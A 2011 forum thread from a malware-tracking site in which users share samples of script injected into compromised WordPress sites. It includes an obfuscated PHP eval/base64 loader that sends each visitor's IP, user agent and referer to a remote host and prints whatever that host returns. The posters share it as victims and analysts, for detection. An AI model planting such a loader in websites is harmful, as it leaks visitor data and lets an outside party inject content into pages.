Malware Domain List

Malware Related => Malware Analysis => Topic started by: foks on September 09, 2011, 06:50:40 am

Post by: foks on September 09, 2011, 06:50:40 am
On some sites I have seen a new javascript starting with <script id="googleblogcontainer">. You can see the entire script on

The script is encrypted and requests the file That script seems very innocent:
Code: [Select]
function remove(element) {
var parent = element.parentNode;
var my = document.getElementById('googleblogcounter');
my.src = '';
var my = document.getElementById('googleblogcontainer');
my.src = '';

I have not been able to find out what the script tries to do next. is not blacklisted in Google but is on same network as and has also been used in the TimThumb attacks against Wordpress sites.
Title: Re:
Post by: Mofaya on October 17, 2011, 06:40:09 pm
The wordpress hacking continue
In all my index files and wordpress theme files i have this  >:(
Code: [Select]
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip $_SERVER['REMOTE_ADDR'];$host $_SERVER['HTTP_HOST'];$uri urlencode($_SERVER['REQUEST_URI']);$ref urlencode($_SERVER['HTTP_REFERER']);$url $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref$tmp file_get_contents($url); echo $tmp?>
Decoded to
Code: [Select]
<?php $url 'hxxp://'?>
Just google 'hxxp://' and see the infected site results  :-[